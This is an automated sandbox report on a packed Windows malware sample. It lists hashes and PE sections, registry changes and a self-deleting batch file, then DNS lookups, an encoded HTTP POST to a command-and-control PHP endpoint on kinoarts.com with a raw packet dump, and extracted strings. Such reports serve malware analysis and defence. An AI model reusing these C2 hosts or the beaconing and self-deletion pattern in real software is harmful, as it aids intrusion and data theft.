Analysis Date: 2014-08-30 19:57:18
MD5: 1352ee89979cb9799d16c015fb06757e
SHA1: 7cfab672f5bb832da7c1eeacc471a54cf327a710

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .f77c md5: 096ad0b95bfcdfbbba7533d71ad8200f sha1: 0cdb72c2c580c57d1a7580b6c1e2a04630f4c781 size: 20480
Section: .4bfb md5: 909054c02e20cb1ff698f8f15f43dde4 sha1: 7bdc25769ddd6f003a3626508dca8a1b696fff8a size: 18432
Section: .607da md5: e3c084b308d418cc3f0f11bfb7dbfa7e sha1: 61d29b616adbdff9b5ec6382d11d21d06d77bc7e size: 59904
Section: .eggf7 md5: 1f3218f010e21daff6a342958e1611e9 sha1: 014189da0832fb941c3df602c562bbd04bf0dbdc size: 2560
Section: .rsrc md5: d54841d9af01dc42e12eac3695135d87 sha1: d46887ba57c2d48f5f33dc5f32e9ff92452f01f5 size: 2048
Timestamp: 2007-03-26 01:37:41
Packer: PEX v0.99
PEhash: 4cf598c5444f620febfa02ec77fe0b2194ab9d29
IMPhash: b23e0c1007332cf323f349238b4c2775

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\RFC1156Agent\CurrentVersion\Parameters\TrapPollTimeMilliSecs ➝ 15000
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\a..bat
Creates Process: C:\WINDOWS\system32\cmd.exe /q /c C:\Documents and Settings\Administrator\Local Settings\Temp\a..bat > nul 2> nul

Process
↳ C:\WINDOWS\system32\cmd.exe /q /c C:\Documents and Settings\Administrator\Local Settings\Temp\a..bat > nul 2> nul

Creates File: nul
Deletes File: C:\malware.exe
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\a..bat

Network Details:

DNS: kinoarts.com
Type: A
192.31.186.4
DNS: petroartsstudio.com
Type: A
DNS: greeartsday.com
Type: A
HTTP POST: http://kinoarts.com/oermb.php?data=v26MmjSySdSkDDR07AUYRrM7Y7/uI9E8OdYISX0iLBsOWQaH2BXayT3wBU3CcFXegcyUv84UKQiBMF4YGmLzfIyRtufRrKX/Mftpu+7vlQ==
User-Agent: wget 3.0
Flows TCP: 192.168.1.1:1031 ➝ 192.31.186.4:80

Raw Pcap
0x00000000 (00000)   504f5354 202f6f65 726d622e 7068703f   POST /oermb.php?
0x00000010 (00016)   64617461 3d763236 4d6d6a53 79536453   data=v26MmjSySdS
0x00000020 (00032)   6b444452 30374155 5952724d 3759372f   kDDR07AUYRrM7Y7/
0x00000030 (00048)   75493945 384f6459 49535830 694c4273   uI9E8OdYISX0iLBs
0x00000040 (00064)   4f575161 48324258 61795433 77425533   OWQaH2BXayT3wBU3
0x00000050 (00080)   43634658 65676379 55763834 554b5169   CcFXegcyUv84UKQi
0x00000060 (00096)   424d4634 59476d4c 7a664979 52747566   BMF4YGmLzfIyRtuf
0x00000070 (00112)   52724b58 2f4d6674 70752b37 766c513d   RrKX/Mftpu+7vlQ=
0x00000080 (00128)   3d204854 54502f31 2e310d0a 41636365   = HTTP/1.1..Acce
0x00000090 (00144)   70743a20 2a2f0d0a 436f6e74 656e742d   pt: */..Content-
0x000000a0 (00160)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x000000b0 (00176)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x000000c0 (00192)   656e636f 6465640d 0a557365 722d4167   encoded..User-Ag
0x000000d0 (00208)   656e743a 20776765 7420332e 300d0a48   ent: wget 3.0..H
0x000000e0 (00224)   6f73743a 206b696e 6f617274 732e636f   ost: kinoarts.co
0x000000f0 (00240)   6d0d0a43 6f6e7465 6e742d4c 656e6774   m..Content-Lengt
0x00000100 (00256)   683a2031 32310d0a 436f6e6e 65637469   h: 121..Connecti
0x00000110 (00272)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x00000120 (00288)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x00000130 (00304)   6f2d6361 6368650d 0a0d0a64 6174613d   o-cache....data=
0x00000140 (00320)   756a6e54 33324f2f 46397173 4479417a   ujnT32O/F9qsDyAz
0x00000150 (00336)   36566c4d 53373533 502f5834 664d4d78   6VlMS753P/X4fMMx
0x00000160 (00352)   5239304e 43436f33 64553143 4857445a   R90NCCo3dU1CHWDZ
0x00000170 (00368)   30306543 32487932 62537947 51305854   00eC2Hy2bSyGQ0XT
0x00000180 (00384)   31702f57 2f5a4961 4a6b2b4f 6444417a   1p/W/ZIaJk+OdDAz
0x00000190 (00400)   42324b36 4c746d52 314c6143 2f716e39   B2K6LtmR1LaC/qn9
0x000001a0 (00416)   49756b36 2b373233 7757612f 536b5472   Iuk6+723wWa/SkTr
0x000001b0 (00432)   48413d3d                              HA==


Strings
.
m
U

B6CG4D7
CCDE1HA
DH63
E431EED
E7DH2
G9F1CE
GGH3B5
HB9AB
HD0AHE
	RC_RCDATA
RC_RCDATA2
RC_RCDATA3
RC_RCDATA4
0c/rz7*
1S/oW)
`.4bfb
4hPq6h
4Tk9	3
.607da
6dcfff2abedgbf9bga980g4h046
740gf909675h89hh79gcgc1da92a26482a4d04e3gb2f0cdh1fh8d167a86gd5bfd2d0h8
8b7b6fc2aheadgg39d0f212g7678c6f53865c1h8886aag9f4dhgf5c589e27eb889c11ef84g27804cc
92c1aebhbf3884cg1ga7ea32hh4c9ff40hcbf33f906ffb1856ca5
aAQt2|
advapi32.dll
</assembly>
   <assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="UAC" type="win32"/>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 
c304he3551ccda27g05b0c92055c6bda36g555
CopyFileExA
 dD63b
`ddqa&
DeleteFileA
DeleteFileW
$eF(<w
@.eggf7
ExitThread
FlushFileBuffers
FormatMessageA
FreeResource
g3gc10fe70ba09ef0d56f1c6602de46h1bf29
\g6U"-
GetCommandLineA
GetFileTime
GetFileType
GetLastError
GetPriorityClass
GetStdHandle
GetWindowTextA
h51X*5
HeapFree
iJ	ZiK
IsMenu
[)jilS
JPADl4
j+S`7(
$K}-)\
kernel32.dll
lstrcmpA
lstrlenA
M5Kh)i
ny!`]>
OpenFile
OpenFileMappingA
:P/%)4
q5<u)*
RegCreateKeyA
RegCreateKeyW
RegDeleteValueA
RegEnumKeyA
RegEnumKeyExW
RegEnumValueW
RegOpenKeyExA
RegQueryValueW
            <requestedExecutionLevel level="highestAvailable"/> 
         </requestedPrivileges>
         <requestedPrivileges>
@.rsrc
      </security>
      <security>
!This program cannot be run in DOS mode.
   </trustInfo>
      <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
user32.dll
WriteFile
x9 !PQ?
X	Buh_$
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
x;)ZGh
	yqIAY